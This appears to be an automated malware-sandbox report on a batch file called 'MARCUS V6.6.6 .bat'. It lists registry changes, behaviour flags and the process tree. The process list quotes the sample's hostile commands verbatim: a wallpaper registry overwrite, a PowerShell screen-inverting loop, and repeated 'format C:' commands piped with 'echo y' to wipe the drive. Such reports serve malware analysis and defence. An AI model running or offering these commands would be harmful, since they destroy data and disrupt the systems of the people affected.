| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "58" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133906568138381664" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-137520623-1834890667-2396102459-1000\{B1A8B0B8-C3C8-4A70-96CE-EC95FC4F6072} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-137520623-1834890667-2396102459-1000\{C7599DDF-BF70-46A0-B2B5-4DEBAD9AA986} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-137520623-1834890667-2396102459-1000\{4E199AB1-8965-4032-9156-73C01C0E33B3} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2ec,0x31c,0x7ffdbf0cf208,0x7ffdbf0cf214,0x7ffdbf0cf220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2056,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=2052 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1936,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=2152 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2552,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=2576 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3440,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3492 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3472,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3508 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5592,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5540 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=3464,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3636 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5496,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5212,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5388 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6020,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5852 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6168,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6200 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6168,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6200 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6376,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6400 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3548,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6372 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6240,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5488 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6268,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6568 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4272,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6572 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5680,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3640 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6152,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5788 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=1268,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6616 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=6640,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6512 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6512,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=896 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4808,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3200 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4936,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3200 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4952,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6612 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=896,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=6380,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6796 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=6932,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6432 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6388,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7104 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=7096,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7140 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7360,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6952 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=6448,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7508 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=7688,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6464 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=7680,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7828 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=7944,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7972 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=6948,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7376 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=8284,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7092 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6404,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7624 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8108,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7644 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=6428,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6584 /prefetch:1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"
C:\Windows\system32\chcp.com
chcp 1250
C:\Windows\system32\mode.com
mode 85,30
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6648,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7272 /prefetch:8
C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat?.WSF//Job:Nyan"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "(New-Object Media.SoundPlayer 'C:\Windows\Media\alarm.mp3').PlayLooping()"
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\magnus\matrix.bmp" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Inverter { [DllImport(\"user32.dll\")] public static extern int InvertRect(IntPtr hDC, ref System.Drawing.Rectangle lprc); }'; $rect = [System.Drawing.Rectangle]::FromLTRB(0,0,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); while($true) { [Inverter]::InvertRect([IntPtr]::Zero, [ref]$rect); Start-Sleep -Milliseconds 50 }"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zceahbm0\zceahbm0.cmdline"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"
C:\Windows\system32\chcp.com
chcp 1250
C:\Windows\system32\mode.com
mode 85,30
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
